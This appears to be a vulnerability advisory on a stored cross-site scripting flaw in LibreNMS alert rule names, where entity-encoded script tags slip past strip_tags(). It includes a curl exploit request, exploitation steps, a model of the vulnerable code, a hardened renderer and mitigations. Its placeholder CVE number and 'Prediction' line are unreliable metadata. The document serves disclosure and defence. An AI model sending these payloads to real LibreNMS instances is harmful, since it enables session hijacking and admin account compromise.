LibreNMS, Cross-Site Scripting, CVE-2025-XXXX (Medium)


The vulnerability in LibreNMS arises from insufficient input sanitization in the Alert Rules functionality. When an authenticated administrator creates or modifies an alert rule, the `name` parameter is submitted to the `/ajax_form.php` endpoint. The server-side handler in `includes/html/forms/alert-rules.inc.php` attempts to sanitize this value with `strip_tags()`, which removes only literal HTML tags (sequences beginning with `<`). It does not decode character references, so the filter is bypassed by encoding the angle brackets as XML/HTML character references: submitting `&lt;script&gt;alert(1)&lt;/script&gt;` as the rule name passes through `strip_tags()` unchanged (numeric forms such as `&#60;` and `&#x3c;` work the same way). The encoded payload is then stored in the database.

The exploit triggers when an admin user views the "Alert Rules" page. The page's JavaScript, specifically the `bootgrid()` function used to render the table, decodes those character references back into real HTML tags and inserts the result as markup rather than text. The browser therefore parses the decoded `<script>` element and executes the embedded JavaScript in the context of the victim's session.
Platform: LibreNMS
Version: 25.8.0
Vulnerability: Stored XSS
Severity: Medium

date: 2025

Prediction: 2025-Q1

What Undercode Says:

# Requires an authenticated admin session; the cookie value is a placeholder.
# type=alert-rules is assumed to select includes/html/forms/alert-rules.inc.php;
# other fields the form expects (rule id, builder JSON, etc.) are omitted here.
# --data-urlencode keeps the '&' of each character reference from being read
# as a form-field separator.
curl -X POST 'http://<target>/ajax_form.php' \
  -b '<admin session cookie>' \
  -d 'type=alert-rules' \
  --data-urlencode 'name=&lt;script&gt;alert(document.domain)&lt;/script&gt;'
// Simulated vulnerable code snippet modelled on alert-rules.inc.php (not the project's verbatim code)
// strip_tags() removes literal <...> tags only; it never decodes &lt; / &gt; / &#60; forms,
// so an entity-encoded payload is stored exactly as submitted.
$rule_id = (int) $_POST['rule_id']; // id of the rule being edited, from the request
$name = strip_tags($_POST['name']);
dbUpdate(['name' => $name], 'alert_rules', 'id=?', [$rule_id]);

How to Exploit:

1. An attacker with admin privileges logs in.
2. The attacker creates a new alert rule (or edits an existing one) with a name containing entity-encoded script tags, e.g. `&lt;script&gt;...&lt;/script&gt;`.
3. When any admin (the attacker or another one) views the Alert Rules list, the stored payload is decoded during table rendering and executed by their browser.
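The following is an added example, not LibreNMS code or code from this advisory. It models both the mechanism described above and the exploit steps: a `strip_tags()`-style filter (approximated here as removal of literal `<...>` sequences, an assumption about the real PHP function that holds for the property that matters, namely that it never decodes character references), the client-side decode step that turns the stored value back into markup, and a hardened renderer that encodes the stored value for the HTML text context instead. The payloads are constructed, and `renderCellVulnerable`, `renderCellSafe` and `simulate` are hypothetical names chosen for this example.

```javascript
// Added example (not LibreNMS code): strip_tags() bypass via character
// references, plus the rendering step that re-creates the tags.

// Constructed payloads: literal, named-entity encoded, numeric encoded.
const PAYLOAD_LITERAL = '<script>alert(1)</script>';
const PAYLOAD_ENCODED = '&lt;script&gt;alert(1)&lt;/script&gt;';
const PAYLOAD_NUMERIC = '&#60;script&#x3E;alert(1)&#60;/script&#x3E;';

// Approximation of PHP strip_tags(): removes literal <...> sequences only
// (assumption: the real function has more parsing rules, but it also never
// decodes entities). Character references contain no '<', so they survive.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, '');
}

// Decodes XML/HTML character references: a named subset plus &#NN; / &#xHH;.
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
function decodeCharRefs(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] === '#') {
      const code = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return String.fromCodePoint(code);
    }
    const named = NAMED[body.toLowerCase()];
    return named !== undefined ? named : m; // unknown name: leave as-is
  });
}

// Context-aware encoding for an HTML text node. '&' is encoded first so
// that already-present references are not turned into live ones.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer: models a grid formatter that decodes the stored value
// and then inserts the result as HTML markup (innerHTML-style).
function renderCellVulnerable(storedName) {
  return `<td>${decodeCharRefs(storedName)}</td>`;
}

// Hardened renderer: the stored value is data, so it is encoded for the text
// context. An encoded payload renders literally as the characters typed.
function renderCellSafe(storedName) {
  return `<td>${escapeHtml(storedName)}</td>`;
}

// Check helper: does the emitted markup contain a real <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// End to end: what the server stores, then what each renderer emits.
function simulate(submittedName) {
  const stored = stripTags(submittedName); // server-side "sanitizer"
  return {
    stored,
    vulnerable: renderCellVulnerable(stored),
    safe: renderCellSafe(stored),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of [PAYLOAD_LITERAL, PAYLOAD_ENCODED, PAYLOAD_NUMERIC]) {
    const r = simulate(p);
    console.log(JSON.stringify({
      submitted: p, ...r,
      vulnerableExecutes: containsScriptTag(r.vulnerable),
      safeExecutes: containsScriptTag(r.safe),
    }, null, 2));
  }
}
```

Running it shows the literal payload losing its tags at the server while both encoded payloads are stored intact; the vulnerable renderer then emits `<td><script>alert(1)</script></td>`, whereas the hardened renderer emits `&amp;lt;script&amp;gt;...`, which the browser displays as the harmless text `&lt;script&gt;...`. The design point is that stripping at input is not a substitute for encoding at output: the safe version does not need to know which encoding trick the attacker used.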

Protection from this CVE:

Update to a LibreNMS release that fixes this issue.

Implement context-aware output encoding: treat the stored rule name as data and HTML-encode it at the point where the Alert Rules table is rendered, rather than relying on `strip_tags()` at input time, which does not decode character references.

Use a Content Security Policy (CSP) that disallows inline scripts, so that an injected `<script>` element does not execute even if the encoding fix is missed somewhere.

Impact:

Session hijacking.

Admin account compromise.

Unauthorized actions.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
